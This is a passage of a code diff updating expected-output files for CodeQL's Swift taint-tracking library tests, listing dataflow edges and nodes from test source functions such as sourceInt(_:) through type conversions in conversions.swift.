@@ -175,7 +175,7 @@ | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:171:7:171:7 | arr1 | | conversions.swift:172:7:172:7 | SSA def(arr2) | conversions.swift:174:13:174:13 | arr2 | | conversions.swift:172:7:172:7 | arr2 | conversions.swift:172:7:172:7 | SSA def(arr2) | -| conversions.swift:172:14:172:26 | [...] | conversions.swift:172:7:172:7 | arr2 | +| conversions.swift:172:14:172:33 | [...] | conversions.swift:172:7:172:7 | arr2 | | conversions.swift:173:13:173:13 | arr1 | conversions.swift:175:13:175:13 | arr1 | | conversions.swift:174:13:174:13 | arr2 | conversions.swift:176:13:176:13 | arr2 | | conversions.swift:175:13:175:13 | [post] arr1 | conversions.swift:178:25:178:25 | arr1 | diff --git a/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected b/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected index 104e2baa545..38d1de0167e 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected 
@@ -1,68 +1,68 @@ edges -| conversions.swift:35:18:35:28 | call to sourceInt() | conversions.swift:35:12:35:29 | call to Float.init(_:) | provenance | | -| conversions.swift:36:19:36:29 | call to sourceInt() | conversions.swift:36:12:36:30 | call to String.init(_:) | provenance | | -| conversions.swift:37:12:37:30 | call to String.init(_:) | conversions.swift:37:12:37:32 | .utf8 | provenance | | -| conversions.swift:37:19:37:29 | call to sourceInt() | conversions.swift:37:12:37:30 | call to String.init(_:) | provenance | | -| conversions.swift:39:12:39:30 | [...] [Collection element] | conversions.swift:40:12:40:12 | arr | provenance | | -| conversions.swift:39:12:39:30 | [...] [Collection element] | conversions.swift:41:12:41:12 | arr [Collection element] | provenance | | -| conversions.swift:39:12:39:30 | [...] [Collection element] | conversions.swift:42:20:42:20 | arr [Collection element] | provenance | | -| conversions.swift:39:12:39:30 | [...] [Collection element] | conversions.swift:43:20:43:20 | arr [Collection element] | provenance | | -| conversions.swift:39:19:39:29 | call to sourceInt() | conversions.swift:39:12:39:30 | [...] [Collection element] | provenance | | +| conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Float.init(_:) | provenance | | +| conversions.swift:36:19:36:38 | call to sourceInt(_:) | conversions.swift:36:12:36:39 | call to String.init(_:) | provenance | | +| conversions.swift:37:12:37:39 | call to String.init(_:) | conversions.swift:37:12:37:41 | .utf8 | provenance | | +| conversions.swift:37:19:37:38 | call to sourceInt(_:) | conversions.swift:37:12:37:39 | call to String.init(_:) | provenance | | +| conversions.swift:39:12:39:39 | [...] [Collection element] | conversions.swift:40:12:40:12 | arr | provenance | | +| conversions.swift:39:12:39:39 | [...] [Collection element] | conversions.swift:41:12:41:12 | arr [Collection element] | provenance | | +| conversions.swift:39:12:39:39 | [...] 
[Collection element] | conversions.swift:42:20:42:20 | arr [Collection element] | provenance | | +| conversions.swift:39:12:39:39 | [...] [Collection element] | conversions.swift:43:20:43:20 | arr [Collection element] | provenance | | +| conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:39:12:39:39 | [...] [Collection element] | provenance | | | conversions.swift:41:12:41:12 | arr [Collection element] | conversions.swift:41:12:41:17 | ...[...] | provenance | | | conversions.swift:42:20:42:20 | arr [Collection element] | conversions.swift:42:12:42:23 | call to Array.init(_:) | provenance | | | conversions.swift:43:12:43:23 | call to Array.init(_:) [Collection element] | conversions.swift:43:12:43:26 | ...[...] | provenance | | | conversions.swift:43:20:43:20 | arr [Collection element] | conversions.swift:43:12:43:23 | call to Array.init(_:) [Collection element] | provenance | | -| conversions.swift:44:20:44:33 | call to sourceString() | conversions.swift:44:20:44:35 | .utf8 | provenance | | -| conversions.swift:44:20:44:35 | .utf8 | conversions.swift:44:12:44:39 | call to Array.init(_:) | provenance | | -| conversions.swift:45:12:45:39 | call to Array.init(_:) [Collection element] | conversions.swift:45:12:45:42 | ...[...] 
| provenance | | -| conversions.swift:45:20:45:33 | call to sourceString() | conversions.swift:45:20:45:35 | .utf8 | provenance | | -| conversions.swift:45:20:45:35 | .utf8 | conversions.swift:45:12:45:39 | call to Array.init(_:) [Collection element] | provenance | | -| conversions.swift:47:13:47:23 | call to sourceInt() | conversions.swift:48:13:48:13 | v | provenance | | -| conversions.swift:51:18:51:41 | call to numericCast(_:) | conversions.swift:52:12:52:12 | v2 | provenance | | -| conversions.swift:51:30:51:40 | call to sourceInt() | conversions.swift:51:18:51:41 | call to numericCast(_:) | provenance | | -| conversions.swift:54:17:54:57 | call to unsafeBitCast(_:to:) | conversions.swift:55:12:55:12 | v4 | provenance | | -| conversions.swift:54:31:54:41 | call to sourceInt() | conversions.swift:54:17:54:57 | call to unsafeBitCast(_:to:) | provenance | | -| conversions.swift:63:11:63:26 | call to abs(_:) | conversions.swift:64:12:64:12 | v7 | provenance | | -| conversions.swift:63:15:63:25 | call to sourceInt() | conversions.swift:63:11:63:26 | call to abs(_:) | provenance | | -| conversions.swift:75:12:75:41 | call to Self.init(_:radix:) [some:0] | conversions.swift:75:12:75:42 | ...! 
| provenance | | -| conversions.swift:75:16:75:29 | call to sourceString() | conversions.swift:75:12:75:41 | call to Self.init(_:radix:) [some:0] | provenance | | -| conversions.swift:77:30:77:40 | call to sourceInt() | conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | provenance | | -| conversions.swift:78:27:78:37 | call to sourceInt() | conversions.swift:78:12:78:38 | call to Self.init(bigEndian:) | provenance | | -| conversions.swift:79:12:79:22 | call to sourceInt() | conversions.swift:79:12:79:24 | .littleEndian | provenance | | -| conversions.swift:80:12:80:22 | call to sourceInt() | conversions.swift:80:12:80:24 | .bigEndian | provenance | | -| conversions.swift:109:18:109:30 | call to sourceFloat() | conversions.swift:109:12:109:31 | call to Float.init(_:) | provenance | | -| conversions.swift:111:19:111:31 | call to sourceFloat() | conversions.swift:111:12:111:32 | call to String.init(_:) | provenance | | -| conversions.swift:112:12:112:32 | call to String.init(_:) | conversions.swift:112:12:112:34 | .utf8 | provenance | | -| conversions.swift:112:19:112:31 | call to sourceFloat() | conversions.swift:112:12:112:32 | call to String.init(_:) | provenance | | -| conversions.swift:113:19:113:33 | call to sourceFloat80() | conversions.swift:113:12:113:34 | call to String.init(_:) | provenance | | -| conversions.swift:114:12:114:34 | call to String.init(_:) | conversions.swift:114:12:114:36 | .utf8 | provenance | | -| conversions.swift:114:19:114:33 | call to sourceFloat80() | conversions.swift:114:12:114:34 | call to String.init(_:) | provenance | | -| conversions.swift:115:19:115:32 | call to sourceDouble() | conversions.swift:115:12:115:33 | call to String.init(_:) | provenance | | -| conversions.swift:116:12:116:33 | call to String.init(_:) | conversions.swift:116:12:116:35 | .utf8 | provenance | | -| conversions.swift:116:19:116:32 | call to sourceDouble() | conversions.swift:116:12:116:33 | call to String.init(_:) | provenance | | -| 
conversions.swift:118:18:118:30 | call to sourceFloat() | conversions.swift:118:12:118:31 | call to Float.init(_:) | provenance | | -| conversions.swift:119:41:119:51 | call to sourceInt() | conversions.swift:119:12:119:70 | call to Float.init(sign:exponent:significand:) | provenance | | -| conversions.swift:120:57:120:69 | call to sourceFloat() | conversions.swift:120:12:120:70 | call to Float.init(sign:exponent:significand:) | provenance | | -| conversions.swift:122:44:122:56 | call to sourceFloat() | conversions.swift:122:12:122:57 | call to Float.init(signOf:magnitudeOf:) | provenance | | -| conversions.swift:124:12:124:24 | call to sourceFloat() | conversions.swift:124:12:124:26 | .exponent | provenance | | -| conversions.swift:125:12:125:24 | call to sourceFloat() | conversions.swift:125:12:125:26 | .significand | provenance | | -| conversions.swift:126:12:126:26 | call to sourceFloat80() | conversions.swift:126:12:126:28 | .exponent | provenance | | -| conversions.swift:127:12:127:26 | call to sourceFloat80() | conversions.swift:127:12:127:28 | .significand | provenance | | -| conversions.swift:128:12:128:25 | call to sourceDouble() | conversions.swift:128:12:128:27 | .exponent | provenance | | -| conversions.swift:129:12:129:25 | call to sourceDouble() | conversions.swift:129:12:129:27 | .significand | provenance | | -| conversions.swift:136:19:136:32 | call to sourceString() | conversions.swift:136:12:136:33 | call to String.init(_:) | provenance | | -| conversions.swift:144:12:144:35 | call to MyString.init(_:) | conversions.swift:144:12:144:35 | call to MyString.init(_:) [some:0] | provenance | | -| conversions.swift:144:12:144:35 | call to MyString.init(_:) | conversions.swift:145:12:145:12 | ms2 | provenance | | -| conversions.swift:144:12:144:35 | call to MyString.init(_:) | conversions.swift:146:12:146:16 | .description | provenance | | -| conversions.swift:144:12:144:35 | call to MyString.init(_:) | conversions.swift:147:12:147:16 | 
.debugDescription | provenance | | -| conversions.swift:144:12:144:35 | call to MyString.init(_:) [some:0] | conversions.swift:144:12:144:36 | ...! | provenance | | -| conversions.swift:144:12:144:36 | ...! | conversions.swift:145:12:145:12 | ms2 | provenance | | -| conversions.swift:144:12:144:36 | ...! | conversions.swift:146:12:146:16 | .description | provenance | | -| conversions.swift:144:12:144:36 | ...! | conversions.swift:147:12:147:16 | .debugDescription | provenance | | -| conversions.swift:144:21:144:34 | call to sourceString() | conversions.swift:144:12:144:35 | call to MyString.init(_:) | provenance | | -| conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:153:12:153:12 | parent | provenance | | -| conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:154:12:154:12 | parent | provenance | | -| conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:156:40:156:40 | parent | provenance | | +| conversions.swift:44:20:44:42 | call to sourceString(_:) | conversions.swift:44:20:44:44 | .utf8 | provenance | | +| conversions.swift:44:20:44:44 | .utf8 | conversions.swift:44:12:44:48 | call to Array.init(_:) | provenance | | +| conversions.swift:45:12:45:48 | call to Array.init(_:) [Collection element] | conversions.swift:45:12:45:51 | ...[...] 
| provenance | | +| conversions.swift:45:20:45:42 | call to sourceString(_:) | conversions.swift:45:20:45:44 | .utf8 | provenance | | +| conversions.swift:45:20:45:44 | .utf8 | conversions.swift:45:12:45:48 | call to Array.init(_:) [Collection element] | provenance | | +| conversions.swift:47:13:47:32 | call to sourceInt(_:) | conversions.swift:48:13:48:13 | v | provenance | | +| conversions.swift:51:18:51:50 | call to numericCast(_:) | conversions.swift:52:12:52:12 | v2 | provenance | | +| conversions.swift:51:30:51:49 | call to sourceInt(_:) | conversions.swift:51:18:51:50 | call to numericCast(_:) | provenance | | +| conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | conversions.swift:55:12:55:12 | v4 | provenance | | +| conversions.swift:54:31:54:50 | call to sourceInt(_:) | conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | provenance | | +| conversions.swift:63:11:63:35 | call to abs(_:) | conversions.swift:64:12:64:12 | v7 | provenance | | +| conversions.swift:63:15:63:34 | call to sourceInt(_:) | conversions.swift:63:11:63:35 | call to abs(_:) | provenance | | +| conversions.swift:75:12:75:50 | call to Self.init(_:radix:) [some:0] | conversions.swift:75:12:75:51 | ...! 
| provenance | | +| conversions.swift:75:16:75:38 | call to sourceString(_:) | conversions.swift:75:12:75:50 | call to Self.init(_:radix:) [some:0] | provenance | | +| conversions.swift:77:30:77:49 | call to sourceInt(_:) | conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | provenance | | +| conversions.swift:78:27:78:46 | call to sourceInt(_:) | conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | provenance | | +| conversions.swift:79:12:79:31 | call to sourceInt(_:) | conversions.swift:79:12:79:33 | .littleEndian | provenance | | +| conversions.swift:80:12:80:31 | call to sourceInt(_:) | conversions.swift:80:12:80:33 | .bigEndian | provenance | | +| conversions.swift:109:18:109:39 | call to sourceFloat(_:) | conversions.swift:109:12:109:40 | call to Float.init(_:) | provenance | | +| conversions.swift:111:19:111:40 | call to sourceFloat(_:) | conversions.swift:111:12:111:41 | call to String.init(_:) | provenance | | +| conversions.swift:112:12:112:41 | call to String.init(_:) | conversions.swift:112:12:112:43 | .utf8 | provenance | | +| conversions.swift:112:19:112:40 | call to sourceFloat(_:) | conversions.swift:112:12:112:41 | call to String.init(_:) | provenance | | +| conversions.swift:113:19:113:42 | call to sourceFloat80(_:) | conversions.swift:113:12:113:43 | call to String.init(_:) | provenance | | +| conversions.swift:114:12:114:43 | call to String.init(_:) | conversions.swift:114:12:114:45 | .utf8 | provenance | | +| conversions.swift:114:19:114:42 | call to sourceFloat80(_:) | conversions.swift:114:12:114:43 | call to String.init(_:) | provenance | | +| conversions.swift:115:19:115:41 | call to sourceDouble(_:) | conversions.swift:115:12:115:42 | call to String.init(_:) | provenance | | +| conversions.swift:116:12:116:42 | call to String.init(_:) | conversions.swift:116:12:116:44 | .utf8 | provenance | | +| conversions.swift:116:19:116:41 | call to sourceDouble(_:) | conversions.swift:116:12:116:42 | call to String.init(_:) 
| provenance | | +| conversions.swift:118:18:118:39 | call to sourceFloat(_:) | conversions.swift:118:12:118:40 | call to Float.init(_:) | provenance | | +| conversions.swift:119:41:119:60 | call to sourceInt(_:) | conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | provenance | | +| conversions.swift:120:57:120:78 | call to sourceFloat(_:) | conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | provenance | | +| conversions.swift:122:44:122:65 | call to sourceFloat(_:) | conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | provenance | | +| conversions.swift:124:12:124:33 | call to sourceFloat(_:) | conversions.swift:124:12:124:35 | .exponent | provenance | | +| conversions.swift:125:12:125:33 | call to sourceFloat(_:) | conversions.swift:125:12:125:35 | .significand | provenance | | +| conversions.swift:126:12:126:35 | call to sourceFloat80(_:) | conversions.swift:126:12:126:37 | .exponent | provenance | | +| conversions.swift:127:12:127:35 | call to sourceFloat80(_:) | conversions.swift:127:12:127:37 | .significand | provenance | | +| conversions.swift:128:12:128:34 | call to sourceDouble(_:) | conversions.swift:128:12:128:36 | .exponent | provenance | | +| conversions.swift:129:12:129:34 | call to sourceDouble(_:) | conversions.swift:129:12:129:36 | .significand | provenance | | +| conversions.swift:136:19:136:42 | call to sourceString(_:) | conversions.swift:136:12:136:43 | call to String.init(_:) | provenance | | +| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:144:12:144:45 | call to MyString.init(_:) [some:0] | provenance | | +| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:145:12:145:12 | ms2 | provenance | | +| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:146:12:146:16 | .description | provenance | | +| conversions.swift:144:12:144:45 | call to MyString.init(_:) | 
conversions.swift:147:12:147:16 | .debugDescription | provenance | | +| conversions.swift:144:12:144:45 | call to MyString.init(_:) [some:0] | conversions.swift:144:12:144:46 | ...! | provenance | | +| conversions.swift:144:12:144:46 | ...! | conversions.swift:145:12:145:12 | ms2 | provenance | | +| conversions.swift:144:12:144:46 | ...! | conversions.swift:146:12:146:16 | .description | provenance | | +| conversions.swift:144:12:144:46 | ...! | conversions.swift:147:12:147:16 | .debugDescription | provenance | | +| conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:144:12:144:45 | call to MyString.init(_:) | provenance | | +| conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:153:12:153:12 | parent | provenance | | +| conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:154:12:154:12 | parent | provenance | | +| conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:156:40:156:40 | parent | provenance | | | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | conversions.swift:157:12:157:12 | v3 | provenance | | | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | conversions.swift:158:12:158:12 | v3 | provenance | | | conversions.swift:156:40:156:40 | parent | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | provenance | | 
@@ -70,11 +70,11 @@ edges | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:175:13:175:19 | ...[...] | provenance | | | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:178:25:178:25 | arr1 | provenance | | | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:185:31:185:31 | arr1 | provenance | | -| conversions.swift:172:14:172:26 | [...] [Collection element] | conversions.swift:174:13:174:13 | arr2 | provenance | | -| conversions.swift:172:14:172:26 | [...] [Collection element] | conversions.swift:176:13:176:13 | arr2 [Collection element] | provenance | | -| conversions.swift:172:14:172:26 | [...] [Collection element] | conversions.swift:179:25:179:25 | arr2 [Collection element] | provenance | | -| conversions.swift:172:14:172:26 | [...] [Collection element] | conversions.swift:186:31:186:31 | arr2 [Collection element] | provenance | | -| conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:172:14:172:26 | [...] [Collection element] | provenance | | +| conversions.swift:172:14:172:33 | [...] [Collection element] | conversions.swift:174:13:174:13 | arr2 | provenance | | +| conversions.swift:172:14:172:33 | [...] [Collection element] | conversions.swift:176:13:176:13 | arr2 [Collection element] | provenance | | +| conversions.swift:172:14:172:33 | [...] [Collection element] | conversions.swift:179:25:179:25 | arr2 [Collection element] | provenance | | +| conversions.swift:172:14:172:33 | [...] [Collection element] | conversions.swift:186:31:186:31 | arr2 [Collection element] | provenance | | +| conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:172:14:172:33 | [...] [Collection element] | provenance | | | conversions.swift:176:13:176:13 | arr2 [Collection element] | conversions.swift:176:13:176:19 | ...[...] 
| provenance | | | conversions.swift:178:19:178:29 | call to Array.init(_:) [Collection element] | conversions.swift:180:13:180:13 | arr1b | provenance | | | conversions.swift:178:19:178:29 | call to Array.init(_:) [Collection element] | conversions.swift:182:13:182:13 | arr1b [Collection element] | provenance | | 
@@ -114,18 +114,18 @@ edges | conversions.swift:225:13:225:13 | withMyValue [v] | conversions.swift:225:13:225:25 | .v | provenance | | | conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | provenance | | | conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:226:10:226:22 | .v | provenance | | -| conversions.swift:232:26:232:37 | call to sourceUInt() | conversions.swift:205:7:205:17 | withUInt | provenance | | -| conversions.swift:235:29:235:48 | call to MyValue.init(_:) [v] | conversions.swift:211:7:211:20 | withMyValue [v] | provenance | | -| conversions.swift:235:37:235:47 | call to sourceInt() | conversions.swift:199:7:199:12 | v | provenance | | -| conversions.swift:235:37:235:47 | call to sourceInt() | conversions.swift:235:29:235:48 | call to MyValue.init(_:) [v] | provenance | | -| conversions.swift:238:30:238:49 | call to MyValue.init(_:) [v] | conversions.swift:217:7:217:21 | withMyValue2 [v] | provenance | | -| conversions.swift:238:30:238:49 | call to MyValue.init(_:) [v] | conversions.swift:238:12:238:50 | call to Int.init(withMyValue2:) | provenance | | -| conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:199:7:199:12 | v | provenance | | -| conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:238:30:238:49 | call to MyValue.init(_:) [v] | provenance | | -| conversions.swift:241:35:241:54 | call to MyValue.init(_:) [v] | conversions.swift:224:20:224:33 | withMyValue [v] | provenance | | -| conversions.swift:241:35:241:54 | call to MyValue.init(_:) [v] | conversions.swift:241:12:241:55 | call to mkInt(withMyValue:) | provenance | | -| conversions.swift:241:43:241:53 | call to sourceInt() | conversions.swift:199:7:199:12 | v | provenance | | -| conversions.swift:241:43:241:53 | call to sourceInt() | conversions.swift:241:35:241:54 | call to MyValue.init(_:) [v] | provenance | | +| conversions.swift:232:26:232:43 | call to sourceUInt(_:) | 
conversions.swift:205:7:205:17 | withUInt | provenance | | +| conversions.swift:235:29:235:54 | call to MyValue.init(_:) [v] | conversions.swift:211:7:211:20 | withMyValue [v] | provenance | | +| conversions.swift:235:37:235:53 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | provenance | | +| conversions.swift:235:37:235:53 | call to sourceInt(_:) | conversions.swift:235:29:235:54 | call to MyValue.init(_:) [v] | provenance | | +| conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | conversions.swift:217:7:217:21 | withMyValue2 [v] | provenance | | +| conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | provenance | | +| conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | provenance | | +| conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | provenance | | +| conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | conversions.swift:224:20:224:33 | withMyValue [v] | provenance | | +| conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | provenance | | +| conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | provenance | | +| conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | provenance | | | file://:0:0:0:0 | [post] self [first] | stringinterpolation.swift:6:6:6:6 | self [Return] [first] | provenance | | | file://:0:0:0:0 | [post] self [second] | stringinterpolation.swift:7:6:7:6 | self [Return] [second] | provenance | | | file://:0:0:0:0 | self [first] | file://:0:0:0:0 | .first | provenance | | 
@@ -209,16 +209,16 @@ edges | try.swift:18:18:18:25 | call to source() | try.swift:18:18:18:25 | call to source() [some:0] | provenance | | | try.swift:18:18:18:25 | call to source() [some:0] | try.swift:18:13:18:25 | try? ... [some:0] | provenance | | nodes -| conversions.swift:32:12:32:22 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:35:12:35:29 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | -| conversions.swift:35:18:35:28 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:36:12:36:30 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:36:19:36:29 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:37:12:37:30 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:37:12:37:32 | .utf8 | semmle.label | .utf8 | -| conversions.swift:37:19:37:29 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:39:12:39:30 | [...] [Collection element] | semmle.label | [...] 
[Collection element] | -| conversions.swift:39:19:39:29 | call to sourceInt() | semmle.label | call to sourceInt() | +| conversions.swift:32:12:32:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:35:12:35:38 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | +| conversions.swift:35:18:35:37 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:36:12:36:39 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:36:19:36:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:37:12:37:39 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:37:12:37:41 | .utf8 | semmle.label | .utf8 | +| conversions.swift:37:19:37:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:39:12:39:39 | [...] [Collection element] | semmle.label | [...] [Collection element] | +| conversions.swift:39:19:39:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:40:12:40:12 | arr | semmle.label | arr | | conversions.swift:41:12:41:12 | arr [Collection element] | semmle.label | arr [Collection element] | | conversions.swift:41:12:41:17 | ...[...] | semmle.label | ...[...] | 
@@ -227,84 +227,84 @@ nodes | conversions.swift:43:12:43:23 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | | conversions.swift:43:12:43:26 | ...[...] | semmle.label | ...[...] | | conversions.swift:43:20:43:20 | arr [Collection element] | semmle.label | arr [Collection element] | -| conversions.swift:44:12:44:39 | call to Array.init(_:) | semmle.label | call to Array.init(_:) | -| conversions.swift:44:20:44:33 | call to sourceString() | semmle.label | call to sourceString() | -| conversions.swift:44:20:44:35 | .utf8 | semmle.label | .utf8 | -| conversions.swift:45:12:45:39 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | -| conversions.swift:45:12:45:42 | ...[...] | semmle.label | ...[...] | -| conversions.swift:45:20:45:33 | call to sourceString() | semmle.label | call to sourceString() | -| conversions.swift:45:20:45:35 | .utf8 | semmle.label | .utf8 | -| conversions.swift:47:13:47:23 | call to sourceInt() | semmle.label | call to sourceInt() | +| conversions.swift:44:12:44:48 | call to Array.init(_:) | semmle.label | call to Array.init(_:) | +| conversions.swift:44:20:44:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:44:20:44:44 | .utf8 | semmle.label | .utf8 | +| conversions.swift:45:12:45:48 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | +| conversions.swift:45:12:45:51 | ...[...] | semmle.label | ...[...] 
| +| conversions.swift:45:20:45:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:45:20:45:44 | .utf8 | semmle.label | .utf8 | +| conversions.swift:47:13:47:32 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:48:13:48:13 | v | semmle.label | v | -| conversions.swift:51:18:51:41 | call to numericCast(_:) | semmle.label | call to numericCast(_:) | -| conversions.swift:51:30:51:40 | call to sourceInt() | semmle.label | call to sourceInt() | +| conversions.swift:51:18:51:50 | call to numericCast(_:) | semmle.label | call to numericCast(_:) | +| conversions.swift:51:30:51:49 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:52:12:52:12 | v2 | semmle.label | v2 | -| conversions.swift:54:17:54:57 | call to unsafeBitCast(_:to:) | semmle.label | call to unsafeBitCast(_:to:) | -| conversions.swift:54:31:54:41 | call to sourceInt() | semmle.label | call to sourceInt() | +| conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | semmle.label | call to unsafeBitCast(_:to:) | +| conversions.swift:54:31:54:50 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:55:12:55:12 | v4 | semmle.label | v4 | -| conversions.swift:63:11:63:26 | call to abs(_:) | semmle.label | call to abs(_:) | -| conversions.swift:63:15:63:25 | call to sourceInt() | semmle.label | call to sourceInt() | +| conversions.swift:63:11:63:35 | call to abs(_:) | semmle.label | call to abs(_:) | +| conversions.swift:63:15:63:34 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:64:12:64:12 | v7 | semmle.label | v7 | -| conversions.swift:75:12:75:41 | call to Self.init(_:radix:) [some:0] | semmle.label | call to Self.init(_:radix:) [some:0] | -| conversions.swift:75:12:75:42 | ...! | semmle.label | ...! 
| -| conversions.swift:75:16:75:29 | call to sourceString() | semmle.label | call to sourceString() | -| conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | semmle.label | call to Self.init(littleEndian:) | -| conversions.swift:77:30:77:40 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:78:12:78:38 | call to Self.init(bigEndian:) | semmle.label | call to Self.init(bigEndian:) | -| conversions.swift:78:27:78:37 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:79:12:79:22 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:79:12:79:24 | .littleEndian | semmle.label | .littleEndian | -| conversions.swift:80:12:80:22 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:80:12:80:24 | .bigEndian | semmle.label | .bigEndian | -| conversions.swift:108:12:108:24 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:109:12:109:31 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | -| conversions.swift:109:18:109:30 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:111:12:111:32 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:111:19:111:31 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:112:12:112:32 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:112:12:112:34 | .utf8 | semmle.label | .utf8 | -| conversions.swift:112:19:112:31 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:113:12:113:34 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:113:19:113:33 | call to sourceFloat80() | semmle.label | call to sourceFloat80() | -| conversions.swift:114:12:114:34 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:114:12:114:36 | 
.utf8 | semmle.label | .utf8 | -| conversions.swift:114:19:114:33 | call to sourceFloat80() | semmle.label | call to sourceFloat80() | -| conversions.swift:115:12:115:33 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:115:19:115:32 | call to sourceDouble() | semmle.label | call to sourceDouble() | -| conversions.swift:116:12:116:33 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:116:12:116:35 | .utf8 | semmle.label | .utf8 | -| conversions.swift:116:19:116:32 | call to sourceDouble() | semmle.label | call to sourceDouble() | -| conversions.swift:118:12:118:31 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | -| conversions.swift:118:18:118:30 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:119:12:119:70 | call to Float.init(sign:exponent:significand:) | semmle.label | call to Float.init(sign:exponent:significand:) | -| conversions.swift:119:41:119:51 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:120:12:120:70 | call to Float.init(sign:exponent:significand:) | semmle.label | call to Float.init(sign:exponent:significand:) | -| conversions.swift:120:57:120:69 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:122:12:122:57 | call to Float.init(signOf:magnitudeOf:) | semmle.label | call to Float.init(signOf:magnitudeOf:) | -| 